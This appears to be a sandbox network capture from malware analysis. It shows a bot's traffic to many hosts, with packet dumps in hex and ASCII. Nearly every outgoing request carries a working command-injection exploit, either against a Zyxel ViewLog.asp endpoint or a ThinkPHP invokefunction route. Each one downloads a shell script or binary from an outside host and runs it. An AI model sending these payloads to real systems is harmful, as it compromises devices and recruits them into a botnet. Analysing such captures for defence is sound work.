                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:21:08.668786049 CET20704OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              552192.168.2.233580894.120.229.1478080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:32.285516977 CET11363OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              553192.168.2.234993094.122.88.668080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:32.287095070 CET11364OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              554192.168.2.235735894.16.107.2058080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:32.914063931 CET11466OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:33.852859020 CET11594OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:34.259788990 CET11621INHTTP/1.1 404 Not Found
                                                              Date: Mon, 13 Nov 2023 21:19:33 GMT
                                                              Server: Apache/2.4.56 (Debian)
                                                              X-Powered-By: PHP/8.0.30
                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                              Link: <http://94.16.107.205:8080/wp-json/>; rel="https://api.w.org/"
                                                              Keep-Alive: timeout=5, max=100
                                                              Connection: Keep-Alive
                                                              Transfer-Encoding: chunked
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 32 35 38 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 64 65 6d 6f 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 39 34 2e 31 36 2e 31 30 37 2e 32 30 35 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 64 65 6d 6f 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 39 34 2e 31 36 2e 31 30 37 2e 32 30 35 3a 38 30 38 30 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 64 65 6d 6f 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 39 34 2e 31 36 2e 31 30 37 2e 32 30 35 3a 38 30 38 30 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 39 34 2e 31 36 2e 31 30 37 2e 32 30 35 3a 38 30 38 30 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 34 2e 31 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69
                                                              Data Ascii: 258f<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='noindex, nofollow' /><title>Page not found &#8211; demo</title><link rel='dns-prefetch' href='//94.16.107.205' /><link rel="alternate" type="application/rss+xml" title="demo &raquo; Feed" href="http://94.16.107.205:8080/feed/" /><link rel="alternate" type="application/rss+xml" title="demo &raquo; Comments Feed" href="http://94.16.107.205:8080/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/94.16.107.205:8080\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.4.1"}};/*! This file i


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              555192.168.2.233956895.217.208.2338080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:32.914158106 CET11466OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:34.505119085 CET11652OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              556192.168.2.233657688.221.71.380
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:33.240279913 CET11480OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:33.538189888 CET11500INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 258
                                                              Expires: Mon, 13 Nov 2023 21:19:33 GMT
                                                              Date: Mon, 13 Nov 2023 21:19:33 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 66 35 61 33 33 62 38 26 23 34 36 3b 31 36 39 39 39 31 30 33 37 33 26 23 34 36 3b 31 33 61 31 37 30 62 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;bf5a33b8&#46;1699910373&#46;13a170b1</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              557192.168.2.235870488.212.246.480
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:33.299048901 CET11484OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:33.652674913 CET11503INHTTP/1.1 400 Bad Request
                                                              Connection: close
                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                              pragma: no-cache
                                                              content-type: text/html
                                                              content-length: 681
                                                              date: Mon, 13 Nov 2023 21:19:33 GMT
                                                              server: LiteSpeed
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 30 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 49 74 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 72 65 71 75 65 73 74 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 400 Bad Request</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1><h2 style="margin-top:20px;font-size: 30px;">Bad Request</h2><p>It is not a valid request!</p></div></div></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              558192.168.2.234872895.98.152.1608080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:33.499012947 CET11496OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              559192.168.2.233894295.217.148.1108080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:33.503848076 CET11496OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              56192.168.2.235429088.198.187.19780
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:17.286261082 CET2204OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:17.590667963 CET2237INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:18:17 GMT
                                                              Server: Apache
                                                              Content-Length: 301
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 6f 73 72 61 6d 2e 6d 65 64 69 61 2d 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache Server at osram.media-navigator.com Port 80</address></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              560192.168.2.235077831.136.241.318080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:33.521667957 CET11497OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:36.777023077 CET11899OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:42.920023918 CET12645OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:54.950520039 CET14257OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:19.523205042 CET17303OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:21:08.668786049 CET20705OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              561192.168.2.235543431.136.24.1318080
                                                              TimestampkBytes transferredDirectionData
